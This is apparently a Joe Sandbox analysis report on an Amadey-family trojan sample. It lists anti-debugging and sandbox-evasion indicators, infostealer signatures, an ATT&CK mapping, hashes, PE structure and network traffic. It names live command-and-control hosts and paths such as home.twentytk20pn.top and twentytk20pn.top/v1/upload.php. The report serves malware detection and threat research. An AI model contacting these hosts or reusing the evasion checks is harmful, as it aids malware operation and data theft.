Source: oJkvQZYkrx.exe, 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: oJkvQZYkrx.exe, 00000000.00000003.1588167953.0000000001BA1000.00000004.00000020.00020000.00000000.sdmp, oJkvQZYkrx.exe, 00000000.00000002.1630801358.0000000001BA8000.00000004.00000020.00020000.00000000.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1588026967.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1587826409.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1588233604.0000000001BA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: oJkvQZYkrx.exe, 00000000.00000003.1525201406.0000000006D51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile opened: NTICE
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile opened: SICE
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00A39980 rdtsc 0_2_00A39980
Source: oJkvQZYkrx.exe, oJkvQZYkrx.exe, 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 147.45.113.159:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
oJkvQZYkrx.exe68%ReversingLabsWin32.Trojan.Amadey
oJkvQZYkrx.exe100%AviraTR/Crypt.TPM.Gen
oJkvQZYkrx.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20pn.top
147.45.113.159
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmloJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtdoJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#oJkvQZYkrx.exefalse
                		high
                https://httpbin.org/ipbeforeoJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1oJkvQZYkrx.exe, 00000000.00000003.1588567855.0000000001B32000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://curl.se/docs/http-cookies.htmloJkvQZYkrx.exe, oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#oJkvQZYkrx.exefalse
                        		high
                        https://curl.se/docs/http-cookies.html#oJkvQZYkrx.exefalse
                          		high
                          https://curl.se/docs/alt-svc.htmloJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://.cssoJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.jpgoJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFoJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    34.226.108.155
                                    		httpbin.orgUnited States
                                    		14618AMAZON-AESUSfalse
                                    147.45.113.159
                                    		home.twentytk20pn.topRussian Federation
                                    		2895FREE-NET-ASFREEnetEUfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1578933
                                    Start date and time:2024-12-20 16:48:34 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 2s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:5
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:oJkvQZYkrx.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:8664a5a6e958f985735b8a17171550bc.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.109.210.53
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: oJkvQZYkrx.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    10:49:46API Interceptor3x Sleep call for process: oJkvQZYkrx.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    34.226.108.1552M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                      f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                        1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                          16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                            hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                              pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                      file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                        147.45.113.159f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                        • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                        u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                        1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                        • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • twentytk20pn.top/v1/upload.php
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                        • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=2Rb3R6cTcShMDFLr1734664370
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • twentytk20pn.top/v1/upload.php
                                                        file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                        • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=aMcIUlaEFPceCafP1734635514
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                        • twentytk20pn.top/v1/upload.php

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        httpbin.org5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                        • 98.85.100.80
                                                        2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 98.85.100.80
                                                        1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                        • 98.85.100.80
                                                        t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                        • 98.85.100.80
                                                        16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                        • 34.226.108.155
                                                        hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                        • 34.226.108.155
                                                        pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        home.twentytk20pn.topf9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                        • 147.45.113.159
                                                        u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 147.45.113.159
                                                        1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                        • 147.45.113.159
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • 147.45.113.159
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                        • 147.45.113.159
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • 147.45.113.159
                                                        file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                        • 147.45.113.159
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                        • 147.45.113.159
                                                        SwJD3kiOwV.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 194.87.47.113
                                                        8dw8GAvqmM.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 194.87.47.113

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        FREE-NET-ASFREEnetEUf9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                        • 147.45.113.159
                                                        u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 147.45.113.159
                                                        1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                        • 147.45.113.159
                                                        Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                        • 147.45.44.131
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • 147.45.113.159
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                        • 147.45.113.159
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • 147.45.113.159
                                                        https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                                        • 147.45.179.98
                                                        file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                        • 147.45.113.159
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                        • 147.45.113.159
                                                        AMAZON-AESUS2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 52.206.106.77
                                                        DzbIZ1HRMj.zipGet hashmaliciousUnknownBrowse
                                                        • 52.0.145.89
                                                        16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                        • 34.226.108.155
                                                        hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                        • 34.226.108.155
                                                        pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        securedoc_20241220T070409.htmlGet hashmaliciousUnknownBrowse
                                                        • 52.86.107.71
                                                        5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.985009488298196
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • VXD Driver (31/22) 0.00%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:oJkvQZYkrx.exe
                                                        File size:4'455'936 bytes
                                                        MD5:8664a5a6e958f985735b8a17171550bc
                                                        SHA1:3deb8bfcdc32ddf9a678f44c59aa70e3a7f5bb5f
                                                        SHA256:ffcc7288342a28c0580bea142951bf4ac33a3f391d8f9323f9e74293d2817e82
                                                        SHA512:adc1c9bc3af3a39b066a9231ef6bd9119d48dff41a4e5bfac695c40a5d2b9e5e9f4eb6e4779408cd7f22fe0e7e5697d7fa314778864fd13bb321db3f8d0514b0
                                                        SSDEEP:98304:i5Vhq3obBjDB2C53R1xQuyJul6y09/LuI7/wH8yO1g:8SobpDRB1XyJul6y04W/wH8y+
                                                        TLSH:9A26334B4E514690C522E237E8EDE783FF2C8F14666DC64E2EF49E6E424BBCC9C51A41
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@...................................D...@... ............................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0xf59000
                                                        Entrypoint Section:.taggant
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                        DLL Characteristics:DYNAMIC_BASE
                                                        Time Stamp:0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp 00007F6D946DAC3Ah
                                                        paddusb mm0, qword ptr [ebx+00h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        jmp 00007F6D946DCC35h
                                                        add byte ptr [ebx], al
                                                        or al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], dh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add al, 00h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add ecx, dword ptr [edx]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add al, 0Ah
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        and dword ptr [eax], eax
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        pop es
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add ecx, dword ptr [edx]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax+eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add ecx, dword ptr [edx]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add dword ptr [eax+00000000h], eax
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x61905f0x73.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6180000x2b0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb570e00x10biyvevdc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xb570900x18biyvevdc
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        0x10000x6170000x283e0070be4dfc07d72cd9be0399aac7b44569unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x6180000x2b00x200115c3312d7518143610cb758fda5fee3False0.798828125data6.054802250814911IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata 0x6190000x10000x200e8fbf92e0939d0cd4935f0fe539e974dFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        0x61a0000x3850000x2003614a0d4db8f77f8c49989733d7f9954unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        biyvevdc0x99f0000x1b90000x1b84006261ed1e7fe64564f4b6c06533dfea5fFalse0.9944533911839863data7.956080074817993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        aogmlwgx0xb580000x10000x40077b2e79f7381cc9749ad0f2b6c4afdd6False0.8486328125data6.3505494398186775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .taggant0xb590000x30000x220062d42cf2e0b88e866a0b179e0e3ecf3eFalse0.06801470588235294DOS executable (COM)0.8416640788077274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_MANIFEST0xb570f00x256ASCII text, with CRLF line terminators0.5100334448160535

                                                        Imports

                                                        DLLImport
                                                        kernel32.dlllstrcpy

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 20, 2024 16:49:42.079335928 CET49704443192.168.2.834.226.108.155
                                                        Dec 20, 2024 16:49:42.079349041 CET4434970434.226.108.155192.168.2.8
                                                        Dec 20, 2024 16:49:42.079541922 CET49704443192.168.2.834.226.108.155
                                                        Dec 20, 2024 16:49:42.092773914 CET49704443192.168.2.834.226.108.155
                                                        Dec 20, 2024 16:49:42.092798948 CET4434970434.226.108.155192.168.2.8
                                                        Dec 20, 2024 16:49:43.839958906 CET4434970434.226.108.155192.168.2.8
                                                        Dec 20, 2024 16:49:43.840643883 CET49704443192.168.2.834.226.108.155
                                                        Dec 20, 2024 16:49:43.840655088 CET4434970434.226.108.155192.168.2.8
                                                        Dec 20, 2024 16:49:43.842166901 CET4434970434.226.108.155192.168.2.8
                                                        Dec 20, 2024 16:49:43.842303991 CET49704443192.168.2.834.226.108.155
                                                        Dec 20, 2024 16:49:43.844793081 CET49704443192.168.2.834.226.108.155
                                                        Dec 20, 2024 16:49:43.844990969 CET4434970434.226.108.155192.168.2.8
